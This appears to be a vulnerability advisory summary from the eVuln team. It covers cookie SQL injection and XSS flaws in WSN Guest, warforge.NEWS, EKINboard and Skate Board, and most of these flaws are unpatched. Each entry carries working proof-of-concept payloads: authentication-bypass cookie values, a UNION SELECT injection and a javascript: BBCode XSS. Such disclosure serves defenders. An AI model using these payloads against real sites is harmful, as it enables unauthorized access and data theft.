Recent Cookie SQL Injection vulnerabilities

Here is short summary of recent Cookie SQL Injection vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.

wsnuser Cookie SQL Injection vulnerability in WSN Guest.

Description.

It is possible to inject arbitrary SQL query using wsnuser cookie parameter in the index.php script.

Parameter wsnuser is used in SQL query without proper sanitation.

Exploit.

Cookie SQL Injection PoC. HTTP query:
GET /wsnguest/index.php?debug=1 HTTP/1.0
Host: website
Cookie: wsnuser=[SQL Injection]

Solution

Solution is not available.

Other details >>

SQL Injection and Multiple XSS in warforge.NEWS.

Description.

Vulnerable script: authcheck.php

Cookie variable $_COOKIE[authusername] is not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Exploit.

Authorization Bypass Example:

URL: http://[host]/news/index.php

Cookie values:

  • authusername=' or 1/*
  • authaccess=1
  • authemail=qwe@qqwe.com
  • authpassword=any
  • authfirst_name=any
  • authlast_name=any
  • authaccess=3

Solution

Solution is not available.

Other details >>

img BBCode XSS and Cookie SQL Injection in EKINboard .

Description.

Arbitrary JavaScript code insertion is possible in BBcode [img].

Vulnerable Script: config.php

Variables $_COOKIE['username'] $_COOKIE['password'] are not properly sanitized. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Exploit.

[img=javascript:alert(123)]

Cookie: username=' or 1/*

Cookie: password=[any]

Solution.

Vendor-provided patch is available here:

http://www.ekinboard.com/forums/v1/viewtopic.php?id=469

Other details >>

Multiple Vulnerabilities in Skate Board.

Description.

Vulnerable script: includes/root/sendpass.php

Variable $_POST[usern] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off

Vulnerable scripts: includes/root/login.phpincludes/root/logged.php

Variables $_POST[usern] $_POST[passwd] $_COOKIE[sf_cookie] are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and make authorization bypass.

Condition: magic_quotes_gpc - off

Administrator has an ability to edit values of variables in config.php This can be used to inject arbitrary PHP code.

System access is possible.

Vulnerable script: includes/root/reguser.php

All user-defined data from registration form isn't properly sanitized. This can be used to inject arbitrary html or script code.

Exploit.

Url: http://[host]/index.php?act=lostpass

Username: aaa' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

a) From login form:

username: [username]' and 1/*

password: any

b) Cookie value

Cookie: sf_cookie=admin%27+and+1%2F%2A%3Basd

Min user chars is: 3; [code]

url: http://[host]/index.php?act=register

username: [XSS]

Full Name: [XSS]

Location: [XSS]

ICQ: [XSS]

Yahoo: [XSS]

Solution

Solution is not available.

Other details >>
Advisories by vuln type